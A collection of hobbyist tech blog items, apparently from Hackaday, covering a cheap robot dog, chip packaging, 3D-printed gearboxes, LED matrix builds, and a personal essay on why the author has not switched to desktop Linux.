Speaking of robots, if you’ve got a spare $50 burning a hole in your pocket, there are probably worse ways to spend it than on this inexplicable robot dog from Temu. Clearly based on a famous and much more expensive robot dog, Temu’s “FIRES BULLETS PET,” as the label on the box calls it, does a lot of things its big brother can’t do out of the box. It has a turret on its back that’s supposed to launch “water pellets” across the room, but does little more than weakly extrude water-soaked gel capsules. It’s also got a dance mode with moves that look like what a dog does when it has an unreachable itch, plus a disappointing “urinate” mode, which given the water-pellets thing would seem to have potential; alas, the dog just lifts a leg and plays recorded sounds of tinkling. Honestly, Reeves did it better, but for fifty bucks, what can you expect?
And finally, we stumbled across this fantastic primer on advanced semiconductor packaging. It covers the entire history of chip packaging, starting with the venerable DIP and going right through the mind-blowing complexity of hybrid bonding processes like die-to-wafer and wafer-to-wafer. Some methods are capable of 10 million interconnections per square millimeter; let that one sink in a bit. We found this article in this week’s The Analog newsletter, which we’ve said before is a must-subscribe.
The video does a great job of explaining the basics of the design. Right off the bat, we’ll say this one isn’t fully printed—it relies on off-the-shelf steel ball bearings. It’s easy to understand why. When you need strong, smooth-rolling parts, it’s hard to print competitive spheres in plastic at home. Plastic BBs will work too, though, as will various off-the-shelf cylindrical rollers. The rest is mostly 3D printed, so with the right design, you can whip up a wave drive to suit whatever packaging requirements you might have.
Combined with a stepper motor and the right off-the-shelf parts, you can build a high-reduction gearbox that can withstand high torque and should have reasonable longevity despite being assembled with many printed components.
Growing up as a kid in the 1990s was an almost magical time. We had the best game consoles, increasingly faster computers at a pace not seen before, the rise of the Internet and World Wide Web, as well the best fashion and styles possible between neon and pastel colors, translucent plastic and also this little thing called Windows 95 that’d take the world by storm.
Yet as great as Windows 95 and its successor Windows 98 were, you had to be one of the lucky folks who ended up with a stable Windows 9x installation. The prebuilt (Daewoo) Intel Celeron 400 rig with 64 MB SDRAM that I had splurged on with money earned from summer jobs was not one of those lucky systems, resulting in regular Windows reinstalls.
As a relatively nerdy individual, I was aware of this little community-built operating system called ‘Linux’, with the online forums and the Dutch PC magazine that I read convincing me that it would be a superior alternative to this unstable ‘M$’ Windows 98 SE mess that I was dealing with. Thus it was in the Year of the Linux Desktop (1999) that I went into a computer store and bought a boxed disc set of SuSE 6.3 with included manual.
Fast-forward to 2025, and Windows is installed on all my primary desktop systems, raising the question of what went wrong in ’99. Wasn’t Linux the future of desktop operating systems?
Focus Groups
Boxed SuSE Linux 6.3 software. (Source: Archive.org)
Generally when companies gear up to produce something new, they will determine and investigate the target market, to make sure that the product is well-received. This way, when the customer purchases the item, it should meet their expectations and be easy to use for them.
This is where SuSE Linux 6.3 was an interesting experience for me. I’d definitely have classified myself in 1999 as your typical computer nerd who was all about the Pentiums and the MHz, so at the very least I should have had some overlap with the nerds who wrote this Linux OS thing.
The comforting marketing blurbs on the box promised an easy installation, bundled applications for everything, while suggesting that office and home users alike would be more than happy to use this operating system. Despite the warnings and notes in the installation section of the included manual, installation was fairly painless, with YAST (Yet Another Setup Tool) handling a lot of the tedium.
However, after logging into the new operating system and prodding and poking at it a bit over the course of a few days, reality began to set in. There was the rather rough-looking graphical interface, with what I am pretty sure was the FVWM window manager for XFree86, no font aliasing and very crude widgets. I would try the IceWM window manager and a few others as well, but to say that I felt disappointed was an understatement. Although it generally worked, the whole experience felt unfinished and much closer to using CDE on Solaris than the relatively Windows 98 or the BeOS Personal Edition 5 that I would be playing with around that time as well.
That’s when a friend of my older brother slipped me a completely legit copy of Windows 2000 plus license key. To my pleasant surprise, Windows 2000 ran smoothly, worked great and was stable as a rock even on my old Celeron 400 rig that Windows 98 SE had struggled with. I had found my new forever home, or so I thought.
Focus Shift
Start-up screen of FreeSCO. (Credit: Lewis “Lightning” Baughman, Wikimedia)
With Windows 2000, and later XP, being my primary desktop systems, my focus with Linux would shift away from the desktop experience and more towards other applications, such as the FreeSCO (en français) single-floppy router project, and the similar Smoothwall project. After upgrading to a self-built AMD Duron 600 rig, I’d use the Celeron 400 system to install various Linux distributions on, to keep tinkering with them. This led me down the path of trying out Wine to try out Windows applications on Linux in the 2000s, along with some Windows games ported by Loki Entertainment, with mostly disappointing results. This also got me to compile kernel modules, to make the onboard sound work in Linux.
Over the subsequent years, my hobbies and professional career would take me down into the bowels of Linux and similar with mostly embedded (Yocto) development, so that by now I’m more familiar with Linux from the perspective of the command line and architectural level. Although I have many Linux installations kicking around with a perfectly fine X/Wayland installation on both real hardware and in virtual machines, generally the first thing I do after logging in is pop open a Bash terminal or two or switching to a different TTY.
Yet now that the rainbows-and-sunshine era of Windows 2000 through Windows 7 has come to a fiery end amidst the dystopian landscape of Windows 10 and with Windows 11 looming over the horizon, it’s time to ask whether I would make the jump to the Linux desktop now.
Linux Non-Standard Base
Bringing things back to the ‘focus group’ aspect, perhaps one of the most off-putting elements of the Linux ecosystem is the completely bewildering explosion of distributions, desktop environments, window managers, package managers and ways of handling even basic tasks. All the skills that you learned while using Arch Linux or SuSE/Red Hat can be mostly tossed out the moment you are on a Debian system, never mind something like Alpine Linux. The differences can be as profound as when using Haiku, for instance.
Rather than Linux distributions focusing on a specific group of users, they seem to be primarily about doing what the people in charge want. This is illustrated by the demise of the Linux Standard Base (LSB) project, which was set up in 2001 by large Linux distributions in order to standardize various fundamentals between these distributions. The goals included a standard filesystem hierarchy, the use of the RPM package format and binary compatibility between distributions to help third-party developers.
By 2015 the project was effectively abandoned, and since then distributing software across Linux distributions has become if possible even more convoluted, with controversial ‘solutions’ like Canonical’s Snap, Flatpak, AppImage, Nix and others cluttering the landscape and sending developers scurrying back in a panic to compiling from source like it’s the 90s all over again.
Within an embedded development context this lack of standardization is also very noticeable, between differences in default compiler search paths, broken backwards compatibility — like the removal of ifconfig — and a host of minor and larger frustrations even before hitting big ticket items like service management flittering between SysV, Upstart, Systemd or having invented their own, even if possibly superior, alternatives like OpenRC in Alpine Linux.
Of note here is also that these system service managers generally do not work well with GUI-based applications, as CLI Linux and GUI Linux are still effectively two entirely different universes.
Wrong Security Model
For some inconceivable reason, Linux – despite not having UNIX roots like BSD – has opted to adopt the UNIX filesystem hierarchy and security model. While this is of no concern when you look at Linux as a wannabe-UNIX that will happily do the same multi-user server tasks, it’s an absolutely awful choice for a desktop OS. Without knowledge of the permission levels on folders, basic things like SSH keys will not work, and accessing network interfaces with Wireshark requires root-level access and some parts of the filesystem, like devices, require the user to be in a specific group.
When the expectation of a user is that the OS behaves pretty much like Windows, then the continued fight against an overly restrictive security model is just one more item that is not necessarily a deal breaker, but definitely grates every time that you run into it. Having the user experience streamlined into a desktop-friendly experience would help a lot here.
Unstable Interfaces
Another really annoying thing with Linux is that there is no stable kernel driver API. This means that with every update to the kernel, each of the kernel drivers have to be recompiled to work. This tripped me up in the past with Realtek chipset drivers for WiFi and Bluetooth. Since these were too new to be included in the Realtek driver package, I had to find an online source version on GitHub, run through the whole string of commands to compile the kernel driver and finally load it.
After running a system update a few days later and doing a restart, the system was no longer to be found on the LAN. This was because the WiFi driver could no longer be loaded, so I had to plug in Ethernet to regain remote access. With this experience in mind I switched to using Wireless-N WiFi dongles, as these are directly supported.
Experiences like this fortunately happen on non-primary systems, where a momentary glitch is of no real concern, especially since I made backups of configurations and such.
Convoluted Mess
This, in a nutshell, is why moving to Linux is something that I’m not seriously considering. Although I would be perfectly capable of using Linux as my desktop OS, I’m much happier on Windows — if you ignore Windows 11. I’d feel more at home on FreeBSD as well as it is a far more coherent experience, not to mention BeOS’ successor Haiku which is becoming tantalizingly usable.
Secretly my favorite operating system to switch to after Windows 10 would be ReactOS, however. It would bring the best of Windows 2000 through Windows 7, be open-source like Linux, yet completely standardized and consistent, and come with all the creature comforts that one would expect from a desktop user experience.
[panjanek] grabbed WS2812B addressable LEDs for this project, assembling them into a 32 x 32 matrix that fits perfectly inside an off-the-shelf Ikea picture frame. The matrix is hooked up to an ESP8266 microcontroller, which acts as the brains of the operation. The WiFi-enabled microcontroller hosts its own web interface, with which the project can be controlled. Upon opening the page, it’s possible to upload a GIF file that will be displayed as an animation on the matrix itself. It’s also possible to stream UDP packets of bitmap data to the device to send real-time animations over a network.
It’s a neat build, and one that answers any questions of what you might display on your LED matrix when you’re finished assembling it. Code is on Github if you fancy implementing the GIF features in your own work. We’ve featured some unexpected LED matrix builds of late, like this innovative device for the M.2 slot. Meanwhile, if you’re cooking up your own creative LED builds, don’t hesitate to let us know on the tipsline!
The M.2 slot is usually used for solid-state storage devices. However, [bitluni] had another fun idea for how to use the interface. He built an M.2 compatible LED matrix that adds a little light to your motherboard.
[bitluni] built a web tool for sending images to the matrix.[bitluni] noted that the M.2 interface is remarkably flexible, able to offer everything from SATA connections to USB, PCI Express, and more. For this project, he elected to rely on PCI Express communication, using a WCH CH382 chip to translate from that interface to regular old serial communication.
He then hooked up the serial interface to a CH32V208 microcontroller, which was tasked with driving a 12×20 monochrome LED matrix. Even better, he was even able to set the microcontroller up to make it programmable upon first plugging it into a machine, thanks to its bootloader supporting serial programming out of the box. Some teething issues required rework and modification, but soon enough, [bitluni] had the LEDs blinking with the best of them. He then built a web-based drawing tool that could send artwork over serial direct to the matrix.
While most of us are using our M.2 slots for more traditional devices, it’s neat to see this build leverage them for another use. We could imagine displays like this becoming a neat little add-on to a blingy computer build for those with a slot or two to spare. Meanwhile, if you want to learn more about M.2, we’ve dived into the topic before.
DIY mechatronics always has some unique challenges when relying on simple tools. 3D printing enables some great abilities but high precision gearboxes are still a difficult problem for many. Answering this problem, [Sergei Mishin] has developed a very interesting gearbox solution based on a research paper looking into simple rollers instead of traditional gears. The unique attributes of the design come from the ability to have a compact angled gearbox similar to a bevel gearbox.
Multiple rollers rest on a simple shaft allowing each roller to have independent rotation. This is important because having a circular crown gear for angled transmission creates different rotation speeds. In [Sergei]’s testing, he found that his example gearbox could withstand 9 Nm with the actual adapter breaking before the gearbox showing decent strength.
Of course, how does this differ from a normal bevel gear setup or other 3D printed gearboxes? While 3D printed gears have great flexibility in their simplicity to make, having plastic on plastic is generally very difficult to get precise and long lasting. [Sergei]’s design allows for a highly complex crown gear to take advantage of 3D printing while allowing for simple rollers for improved strength and precision.
While claims of “zero backlash” may be a bit far-fetched, this design still shows great potential in helping make some cool projects. Unique gearboxes are somewhat common here at Hackaday such as this wobbly pericyclic gearbox, but they almost always have a fun spin!